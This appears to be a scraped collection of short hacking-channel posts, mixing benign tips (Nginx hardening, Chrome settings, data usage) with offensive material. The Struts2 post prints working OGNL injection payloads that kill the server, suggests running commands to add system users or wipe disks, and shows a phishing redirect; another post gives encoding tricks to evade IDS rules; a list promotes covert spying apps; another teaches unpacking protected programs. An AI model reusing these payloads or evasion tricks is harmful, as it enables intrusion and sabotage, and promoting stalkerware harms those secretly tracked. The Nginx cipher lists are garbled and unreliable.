▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑5G Cellular Attacks :


- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)

- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)

- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)

- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)

- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)

- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)

- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)

- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)

don't copy our tutorials
git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Struts2 security vulnerability analysis by undercode :

1) remotely execute script code server

user can construct http:? //Host/struts2-blank/example/X.action action :%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} link, command goes here can be replaced It is the purpose of destroying the path and parameters of the script, such as fdisk -f, etc., so that the system cannot run.

2) Redirection vulnerabilities

users can construct a redirection connection like Taobao, a well-known website, in the form of <a href="http://www.淘宝.com/item00001.html?redirect:http://hacker/getyourPassword">discount new styles< /a>, guide the user to click to enter the phishing website, and log in on the interface to obtain the user's password.

3) Impact:
Apple, China Mobile, China Unicom, Baidu, Tencent, Taobao, JD.com, Sohu, Minsheng Bank and other large-scale corporate websites have all been poisoned, and the operation and maintenance engineers are miserable.

🦑Countermeasures: The

Apache team urgently released the Struts 2.3.15.1 security update version, which can be upgraded to this version to solve the above problems.

Struts2 vulnerability attack methods and solutions

1) Principle
The core of Struts2 is the webwork framework used. When processing the action, the http parameters are processed by calling the underlying getter/setter method. It declares each http parameter as an ONGL (here is ONGL Introduction) statement. When we submit an http parameter:

?user.address.city=Bishkek&user['favoriteDrink']=kumys
ONGL converts it to:

//code @Undercoder
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed through the ParametersInterceptor (parameter filter), calling ValueStack.setValue() with the HTTP parameters provided by the user.

2) In order to prevent tampering with server-side objects, XWork's ParametersInterceptor does not allow the "#" character in the parameter name, but if the Java unicode string is used to represent \u0023, the attacker can bypass the protection and modify the value executed by the Java method:

The code here is destructive, please execute it in a test environment, and it is strictly forbidden to use this method for malicious attacks

//code @Undercoder
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew% 20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
After escaping, it
looks like this: ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new %20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')( #rt=@java.lang.Runtime@getRuntime()))=1

The final result of OGNL processing is
java.lang.Runtime.getRuntime().exit(1); //Close the program, that is, close the web program

🦑Similar can be executed
java.lang.Runtime.getRuntime().exec("net user username and password/add");//Increase the operating system user, it can be successful if there is permission (replace %20 in the URL Space, %2F replace /)
As long as you have permission, you can execute any DOS command.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST GPS TRACKING ANDROID APPS 2020 :

https://www.gpswox.com/en/gps-trackers-shop/all/mobile-gps-tracker-3

https://play.google.com/store/apps/details?id=com.fmee.fmeeservf&hl=en

https://apps.apple.com/us/app/followmee-gps-location-tracker/id640133448

https://apps.apple.com/us/app/life360-find-family-friends/id384830320

https://apps.apple.com/us/app/waze-navigation-live-traffic/id323229106

https://play.google.com/store/apps/details?id=com.waze&hl=en

https://play.google.com/store/apps/details?id=com.mapquest.android.ace&hl=en

https://apps.apple.com/us/app/mapquest-gps-navigation-maps/id316126557

https://play.google.com/store/apps/details?id=com.wondershare.famisafe

https://apps.apple.com/app/famisafe-parental-control/id1385417904

https://play.google.com/store/apps/details?id=com.mendhak.gpslogger&hl=en_IN

https://play.google.com/store/apps/details?id=com.alienmanfc6.wheresmyandroid&hl=en_IN

https://play.google.com/store/apps/details?id=com.fsp.android.c&hl=en

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Methode for Hide secrets with invisible characters in plain text securely using passwords 🧙🏻‍♂️⭐️

F E A T U R E S :

1) Protect your invisible secret using passwords and HMAC integrity

2) Cryptographically secure by encrypting the invisible secret using AES-256-CTR.

3) Uses 6 Invisible characters in unicode characters that works everywhere in the web - Tweets, Gmail, WhatsApp, Telegram, Instagram, Facebook, and many more!

4) Maximum Compression to reduce the payload (LZ, Huffman).
Completely invisible, uses Zero Width Characters instead of white spaces or tabs.

5) Super fast! Hides the Wikipedia page-source for steganography (800 lines and 205362 characters) within a covertext of 3 words in under one second.

6) Hiding files in strings can be achieved by uploading the file to cloud and stegcloaking the link in the string
Written in pure functional style.
Usage - Available as an API module, a CLI and also a Web Interface (optimized with web workers).

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/KuroLabs/stegcloak.git

2) $ npm install -g stegcloak

3) Using npm (to use it locally in your program),

$ npm install stegcloak

Hide
$ stegcloak hide

🦑Options:

hide [options] [secret] [cover]

-fc, --fcover <file> Extract cover text from file
-fs, --fsecret <file> Extract secret text from file
-n, --nocrypt If you don't need encryption (default: false)
-i, --integrity If additional security of preventing tampering is needed (default: false)
-o, --output <output> Stream the results to an output file
-c, --config <file> Config file
-h, --help display help for command

Reveal
$ stegcloak reveal
Options:

reveal [message]

-f, --file <file> Extract message from file
-cp, --clip Copy message directly from clipboard
-o, --output <output> Stream the secret to an output file
-c, --config <file> Config file
-h, --help display help for command


✅git 2020
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 WORKING SPYING APPS ANDROID LIST 4:

https://www.flexispy.com/en/android-spy-app-flexispy.htm

https://play.google.com/store/apps/details?id=com.google.android.apps.kids.familylink

https://play.google.com/store/apps/details?id=com.google.android.apps.adm

https://play.google.com/store/apps/details?id=net.frju.heimdall

https://play.google.com/store/apps/details?id=com.prey

https://spyera.com/android-spy-app/

https://play.google.com/store/apps/details?id=com.wavemarket.finder.mobile

https://findmymobile.samsung.com/

https://xnspy.com/android-spy.html

Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🌐Some Nginx security configuration tips by undercode:

1) Basic security setup
The best way to protect your web server is to provide the attacker with a minimum of data: version number of Nginx, PHP, OS, etc.

Typically, information is hidden in HTTP headers.

# Only return Nginx in server header
server_tokens off ;
Testing
# Display title
curl https://mywebserver.domain.net/ -ksv 2> & 1> / dev / null | grep Server


2) Strict Transport Security (HSTS)
This setting allows you to declare to the HTTP client that your web server allows HTTP.

The HSTS policy protects users from eavesdropping attacks.

A man-in-the-middle attack cannot intercept the request while the HSTS is active.

add_header Strict-Transport-Security "max-age = 15552001; includeSubdomains; preload";

3) Other means of protection
# Server passes inodes through blocked ETag

etag off;
more_clear_headers 'ETag';

🦑 Anti-clickjacking :

add_header X-Frame-Options "SAMEORIGIN";

1) SSL and TLS encryption protocols
When we talk about SSL, it is actually SSL / TLS.

You should be aware that SSL has been deprecated since 1999 and its latest version, SSLv3, dates from 1996.

Since then, TLS has come into play and three versions have been released: TLSv1.0, TLSv1.1, and TLSv1.2.


Google claims that as of October 14, 2014, it can decrypt messages using SSLv3 through the POODLE attack.

While 2/3 of the web servers on the Internet accept and use this protocol, the community was in a panic.

Admittedly, the exploit is not easy, but if we combine with an attack that lowers the level of cryptography (like Logjam, see below), then all versions of TLS can be affected.

The best way to protect yourself is to disable SSLv3.

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
Testing the configuration
echo -n | openssl s_client -connect mywebserver.domain.net:443 -ssl3


2) Encryption algorithms
Encryption algorithms are divided into 4 types:

- Key exchange
- Authentication
- Block encryption
- Message authentication

Some algorithms (RC4, DH, 3DES, EXP, etc.) should be avoided and others should be given priority.
# Best ratio Security / Accessibility
ssl_ciphers CDHE-RSA-AES128-GCM-SHA256: ECDHE-ECDSA-AES128-GCM-SHA256: ECDHE-RSA-AES256-GCM-SHA384: ECDHE-ECDSA-AES256-GCM-SHA384: DHE-RSA256 : DHE-DSS-AES128-GCM-SHA256: kEDH + AESGCM: ECDHE-RSA-AES128-SHA256: ECDHE-ECDSA-AES128-SHA256: ECDHE-RSA-AES128-SHA: ECDHE-ECDHE-AES12 -AES256-SHA384: ECDHE-ECDSA-AES256-SHA384: ECDHE-RSA-AES256-SHA: ECDHE-ECDSA-AES256-SHA: DHE-RSA-AES128-SHA256: DHE-RSA-AES128-DSSA-DHE -SHA256:! DHE-RSA-AES256-SHA256: DHE-DSS-AES256-SHA:! DHE-RSA-AES256-SHA: AES128-GCM-SHA256:! AES256-GCM-SHA384: AES128-SHA256: !256256-SHA : AES128-SHA:! AES256-SHA: AES: DES-CBC3-SHA:! ANULL:! ENULL:! EXPORT:! DES:! RC4:! MD5:! PSK:! AECDH:! EDH-DSS-DES-CBC3 -SHA:! EDH-RSA-DES-CBC3-SHA:! KRB5-DES-CBC3-SHA;

# Secure
ssl_ciphers EECDH + AESGCM: EDH + AESGCM: AES256 + EECDH: AES256 + EDH;

# Global
ssl_ciphers EECDH + AESGCM: EDH + AESGCM: AES256 + EECDH: ECDHE-RSA-AES128-SHA: DHE-RSA-


Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How do I stop Google Chrome from Restoring Tabs?
#forBeginers

» Method of Stopping Google Chrome from Restoring Tabs:
For stopping Google Chrome from restoring tabs, you will need to perform the following steps:

1) Launch Google Chrome by double-clicking on its shortcut icon located on your desktop.

2) Now click on the three dots located at the top right corner of your Google Chrome window

3) As soon as you will click on this icon, a cascading menu will appear on your screen. Select the Settings option from this menu

4) In the Google Chrome Settings window, scroll down to the “On start-up” section and then select the Open the New Tab page radio button as highlighted in the image shown below for restricting Google Chrome from restoring tabs.
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ExampleS TRICKS break through the IDS intrusion detection system :

1) trick: use the path separator "\"

For Web servers like Microsoft's IIS, "\" can also be used as a path separator like "/". Some IDS did not consider the non-standard path separator "\" when setting up the rule set file. If we rewrite /msadc/msadcs.dll to \msadc\ msadcs.dll, we can escape snort, because there is no identification mark of \msadc\ msadcs.dll in the snort rule set file. It is worth mentioning that the path separator "\" also has a magical effect, which is the "%5c" violent library method mentioned in the "Hacker Defense" some time ago. "%5c" is the hexadecimal representation of "\".

2) trick: hexadecimal encoding

For a character, we can use the escape symbol "%" plus its hexadecimal ASCII code to represent it. For example, the first character "/" in /msadc/msadcs.dll can be expressed as %2F, and the following characters can be expressed by their corresponding hexadecimal ASCII code combined with "%". The URL encoded by this method It is no longer what it was before, and there may be no encoded string in the IDS rule set file, so IDS can be bypassed. But this method is invalid for IDS that uses HTTP preprocessing technology.

3) trick. Illegal Unicode encoding

UTF-8 encoding allows the character set to contain more than 256 characters, so it also allows more than 8 bits of encoding. The hexadecimal ASCII code of the "/" character is 2F, and the binary number is 00101111. The standard way to represent 2F in UTF-8 format is still 2F, but multi-byte UTF-8 can also be used to represent 2F. The character "/" can be represented by single-byte, double-byte, and three-byte UTF-8 encoding as shown in the following table:

"/" character representation binary hexadecimal

Single byte 0xxxxxxx 00101111 2F

Double byte 110xxxxx 10xxxxxx 11000000 10101111 C0 AF

Three bytes 1110xxxx 10xxxxxx 10xxxxxx 11100000 10000000 10101111 E0 80 AF

According to this method, we can encode the entire string accordingly. Although the resources that the encoded URLs ultimately point to are the same, their expressions are different, and the filter string may not exist in the IDS rule set file, thus achieving the goal of breaking through the IDS.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 best file sharing apps for Android :


https://play.google.com/store/apps/details?id=com.reliance.jio.jioswitch&hl=en

https://play.google.com/store/apps/details?id=com.google.android.apps.nbu.files&hl=en

https://play.google.com/store/apps/details?id=cn.xender&hl=en

https://play.google.com/store/apps/details?id=com.lenovo.anyshare.gps&hl=en

https://play.google.com/store/apps/details?id=com.pushbullet.android.portal

https://play.google.com/store/apps/details?id=com.sand.airdroid

https://play.google.com/store/apps/details?id=org.mozilla.firefoxsend

https://play.google.com/store/apps/details?id=com.genonbeta.TrebleShot&hl=en

https://play.google.com/store/apps/details?id=net.easyjoin.pro

Your not allowed to clone our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Commonly used unpacking method
#Cracking

A) Single-step tracking method

1) Load with OD, click "Do not analyze code"

2) Single-step downward tracking F8 to achieve downward jump. That is to say, the upward jump is not allowed to be realized (through F4)

3) When the program jumps back (including loops), we press F4 at the next line of code (or right-click the code and select the breakpoint—— >Run to the selected)

4) The green line indicates that the jump has not been realized, don't care, the red line indicates that the jump has been realized

5) If the program has just been loaded, there is a CALL nearby, we will follow up with F7, Otherwise, the program is easy to run away, so that the OEP of the program can be quickly reached.

6) When tracking, if it runs to a certain CALL program, it will run, just enter F7 in this CALL

7) Generally, there are large jumps (large spans), such as jmp XXXXXX or JE XXXXXX or RETN, which will usually go to the OEP of the program soon.
Note: When some shells cannot be tracked down, we can Find an unrealized big jump nearby, right click --> "Follow", then F2 to break, Shift+F9 stops at the "Follow" position, then cancel the breakpoint, and continue F8 single-step tracking. Under normal circumstances, you can easily reach the OEP


Your not allowed to clone our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

In this PDF, we will be discussing on SMTP log poisoning. But before getting in details, kindly read our previous articles for “SMTP Lab Set-Up” and “Beginner Guide to File Inclusion Attack (LFI/RFI)” . Today you will see how we can exploit a web server by abusing SMTP services if the web server is vulnerable to local file Inclusion
#Practical

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Track mobile traffic consumption on iPhone and Android :

1) Tracking traffic consumption on iPhone
When you insert a SIM card or activate an eSIM, the iPhone receives data from the operator, including the tariff plan, billing cycle, current traffic consumption. Since this is operator information, you cannot track this information completely independently. But you can see the increase in consumption in order to prevent some suspicious spikes.

2) In the "Consumption" section, you can see the traffic consumption. If you scroll down to the Cellular Traffic section, you will find a list of applications. You can turn off the switch to prevent the app from wasting mobile traffic. Instead, it will only use Wi-Fi to access the Internet. This is fine if your mobile traffic limit does not exceed 5 GB.

3) If you are gradually approaching the limit, in order to avoid exceeding it is better to turn on the Low Data Mode. To do this, select the mobile options in the same menu. Once enabled, applications will not use mobile traffic unless you purposefully work with them. Video streaming is reduced, automatic data synchronization is disabled, and services like photos will no longer be updated.

4) The system does not have a built-in ability to issue alerts when the traffic limit is approaching. This can be done using third-party applications. For example, telecom operators may have similar programs. Without the help of third-party applications, you can only periodically check the traffic consumption in the system settings in the "Consumption" section.

Your not allowed to copy our tutorials!

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Some New Proxies:

https://pastebin.com/gFhxWnMB